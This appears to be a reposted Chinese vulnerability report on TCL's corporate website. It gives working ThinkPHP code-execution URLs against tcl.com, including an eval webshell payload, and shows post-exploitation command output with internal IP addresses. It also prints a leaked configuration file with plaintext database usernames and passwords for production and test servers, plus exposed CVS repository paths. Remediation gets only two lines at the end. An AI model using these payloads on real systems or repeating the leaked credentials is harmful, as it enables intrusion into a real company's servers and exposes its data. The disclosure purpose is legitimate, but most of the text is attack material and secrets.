TCL官网命令执行导致getshell（可内网，附赠信息泄

TCL官网命令执行导致getshell

1. 主站命令执行是thinkphp的命令执行漏洞，这么久了还没修复，维护人员该打pp了 http://www.tcl.com/new/1735.html/abc/abc/abc/${@phpinfo()} 直接http://www.tcl.com/new/1735.html/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D getshell 来张图

内网信息

[/var/www/html/tcl/]$ whoami apache [/var/www/html/tcl/]$ ifconfig eth0 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B0 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) eth1 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B2 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) eth2 Link encap:Ethernet HWaddr 40:F2:E9:29:38:D2 inet addr:10.4.22.72 Bcast:10.4.255.255 Mask:255.255.0.0 inet6 addr: fe80::42f2:e9ff:fe29:38d2/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:291345943 errors:0 dropped:0 overruns:0 frame:0 TX packets:420280104 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:56145622678 (52.2 GiB) TX bytes:489393736613 (455.7 GiB) Memory:91580000-915a0000

内网敏感信息泄漏翻下目录，发现了内网好多信息 1. n多数据库账户密码泄漏

<?php switch($_SERVER["HTTP_HOST"]) { case "localhost:8080": { //本机 $db_host = "localhost"; $db_name = "tcl"; $db_user = 'root'; $db_pass = 'root'; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2; $html_cache = false; $temp_my_cache = false; break; } case "10.4.21.23": { //测试 $db_host = "10.4.21.20"; $db_name = "tcl"; $db_user = 'tcladmin'; $db_pass = '123456'; $db_host_en = "10.4.21.20"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2; $html_cache = false; $temp_my_cache = false; break; } case "10.4.21.24": { //测试2 $db_host = "10.4.21.20"; $db_name = "tcl"; $db_user = 'tcladmin'; $db_pass = '123456'; $db_host_en = "10.4.21.20"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2; $html_cache = false; $temp_my_cache = false; break; } case "10.4.22.72": { //正式 $db_host = "10.4.22.71"; $db_name = "tcl"; $db_user = 'tcl_admin'; $db_pass = 'zpw@8b!gurvu'; $db_host_en = "10.4.22.71"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2; $html_cache = false; $temp_my_cache = false; break; } case "10.4.22.73": { //正式2 $db_host = "10.4.22.71"; $db_name = "tcl"; $db_user = 'tcl_admin'; $db_pass = 'zpw@8b!gurvu'; $db_host_en = "10.4.22.71"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2; $html_cache = false; $temp_my_cache = false; break; } default : { //正式 $db_host = "10.4.22.71"; $db_name = "tcl"; $db_user = 'tcl_admin'; $db_pass = 'zpw@8b!gurvu'; $db_host_en = "10.4.22.71"; $db_name_en = "tcl_en"; $cache_type = "File"; $url_model = 2; $html_cache = false; $temp_my_cache = true; break; } } ?>

2. 附赠子域名站点cvs信息泄漏一枚 http://multimedia.tcl.com/cn/investor/CVS/Root http://multimedia.tcl.com/CVS/Root http://multimedia.tcl.com/en/home/CVS/Root

:sspi:mars.ho@source.loko-asia.com:2401/cvsdata

修复方案：

1. 升级 2. 改口令，之前不知道还有没有其他黑客来过，一定要改，那些黑帽黑客绝对不是吃素的

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did15495

更新时间：2022-09-13 阅读：85次